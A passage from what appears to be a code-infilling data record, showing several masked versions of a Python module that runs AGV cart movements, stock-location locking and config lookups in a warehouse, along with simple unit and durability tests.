str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\n<mask token>\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\n<mask token>\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\n<mask token>\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\n<mask token>\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\n<mask token>\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\ndef _call(agvId, locId):\n if api.isCartLoc(locId):\n api.move(agvId, locId + '.1')\n lockStockA(agvId, locId)\n try:\n api.mission(agvId, 1)\n except Exception as e:\n unlockStockA(agvId, locId)\n raise e\n else:\n api.move(agvId, locId)\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\ndef _call(agvId, locId):\n if api.isCartLoc(locId):\n api.move(agvId, locId + '.1')\n lockStockA(agvId, locId)\n try:\n api.mission(agvId, 1)\n except Exception as e:\n unlockStockA(agvId, locId)\n raise e\n else:\n api.move(agvId, locId)\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\ndef Init():\n import interface.dashboard.dashboardApi\n locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)\n time.sleep(3)\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == 